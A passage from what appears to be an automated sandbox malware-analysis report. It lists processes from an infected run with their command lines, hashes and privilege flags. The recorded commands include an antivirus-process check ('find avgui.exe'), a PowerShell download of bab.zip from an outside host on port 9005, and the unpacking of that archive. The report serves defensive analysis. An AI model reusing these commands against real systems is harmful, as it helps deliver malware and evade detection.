                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:08:30:07
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:find /i "avgui.exe"
                                                                                                    Imagebase:0x7ff7e1f90000
                                                                                                    File size:17'920 bytes
                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:08:30:08
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:08:30:10
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                    Imagebase:0x7ff74bb60000
                                                                                                    File size:3'581'912 bytes
                                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:10
                                                                                                    Start time:08:30:10
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                    File size:55'320 bytes
                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:11
                                                                                                    Start time:08:30:11
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                    Imagebase:0x7ff74bb60000
                                                                                                    File size:3'581'912 bytes
                                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:17
                                                                                                    Start time:08:31:14
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Reset < >
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.2437220412.00007FFD9AA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9aa50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f44a8849670eaf2cab77aa8892d191ce4052d3a0eea2924082f78f1a86e3aaf1
                                                                                                      • Instruction ID: 1e5d5c0320dafe8bbee87f9d39fd603e5f28e75674bc42841766018aa89587f7
                                                                                                      • Opcode Fuzzy Hash: f44a8849670eaf2cab77aa8892d191ce4052d3a0eea2924082f78f1a86e3aaf1
                                                                                                      • Instruction Fuzzy Hash: 5001A73120CB0C4FD748EF0CE451AA5B7E0FB85324F10056EE58AC3695D632E882CB46